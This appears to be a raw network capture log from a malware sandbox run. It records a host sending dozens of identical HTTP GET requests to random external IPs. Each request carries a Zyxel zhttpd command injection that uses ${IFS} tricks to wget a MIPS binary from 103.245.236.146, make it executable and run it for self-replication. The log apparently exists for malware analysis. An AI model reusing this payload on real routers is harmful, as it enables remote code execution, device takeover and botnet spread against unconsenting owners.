                                              Jan 29, 2024 07:03:48.985030890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4167192.168.2.1439564159.43.89.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985074043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4168192.168.2.14346249.86.15.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985106945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4169192.168.2.143868083.211.198.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985150099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4170192.168.2.143722038.104.168.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985199928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4171192.168.2.146073468.208.30.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985199928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4172192.168.2.1455094181.43.229.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985249996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4173192.168.2.1448020128.21.246.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985285997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4174192.168.2.143300272.152.77.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985346079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4175192.168.2.1450780161.203.216.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985363960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4176192.168.2.1436902138.225.60.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985407114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4177192.168.2.145305444.24.153.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985435009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4178192.168.2.1448998217.60.76.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985479116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4179192.168.2.1435606191.179.146.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985503912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4180192.168.2.145571647.189.21.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985564947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4181192.168.2.1445606219.162.185.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985586882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4182192.168.2.1443304177.75.112.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985641956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4183192.168.2.14335401.174.17.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985665083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4184192.168.2.145432275.20.194.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985696077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4185192.168.2.145399818.190.144.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985698938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4186192.168.2.144935496.145.92.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985766888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4187192.168.2.1436438102.69.124.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985801935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4188192.168.2.144742435.45.0.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985829115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4189192.168.2.1443702139.77.125.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985867023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4190192.168.2.145454090.144.44.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985925913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4191192.168.2.14393061.209.122.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985939980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192192.168.2.144086451.217.222.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.985981941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4193192.168.2.144979250.187.50.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986017942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4194192.168.2.143501212.218.84.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986058950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4195192.168.2.1443758204.171.148.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986088991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4196192.168.2.1446214220.53.186.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986114025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4197192.168.2.143329279.92.115.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986175060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4198192.168.2.145967294.38.248.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986191034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4199192.168.2.145069654.109.67.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986231089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4200192.168.2.144979484.137.28.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986270905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4201192.168.2.144164498.223.247.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986316919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4202192.168.2.144398657.88.70.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986356974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4203192.168.2.1433768132.82.31.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986392975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4204192.168.2.1453572110.28.230.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986413002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4205192.168.2.143867845.86.173.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986464024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4206192.168.2.143867272.255.88.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986512899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4207192.168.2.1448410136.61.124.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986560106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4208192.168.2.144929232.105.184.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986577988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4209192.168.2.145675884.228.32.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986603022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4210192.168.2.1435428171.37.32.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986638069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4211192.168.2.144787213.58.10.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986679077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4212192.168.2.1440452209.45.247.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986709118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4213192.168.2.1451760149.13.76.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986726999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4214192.168.2.143849862.201.238.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986790895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4215192.168.2.144941253.78.164.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986815929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4216192.168.2.144834037.59.73.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986929893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4217192.168.2.144453054.118.7.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986962080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4218192.168.2.14467868.182.180.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.986995935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4219192.168.2.1443444160.136.181.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987037897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4220192.168.2.1451598212.185.138.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987095118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4221192.168.2.144966658.230.117.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987126112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4222192.168.2.1442864136.105.254.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987152100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4223192.168.2.143771420.210.47.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987195015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4224192.168.2.1458782185.61.120.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987222910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4225192.168.2.1445216138.214.73.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987272024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4226192.168.2.1452764110.191.214.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987318993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4227192.168.2.1456724118.235.118.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987370014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4228192.168.2.1436060177.60.117.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987389088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4229192.168.2.1459118182.81.211.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.987416983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4230192.168.2.143495035.208.71.254443
                                              TimestampBytes transferredDirectionData
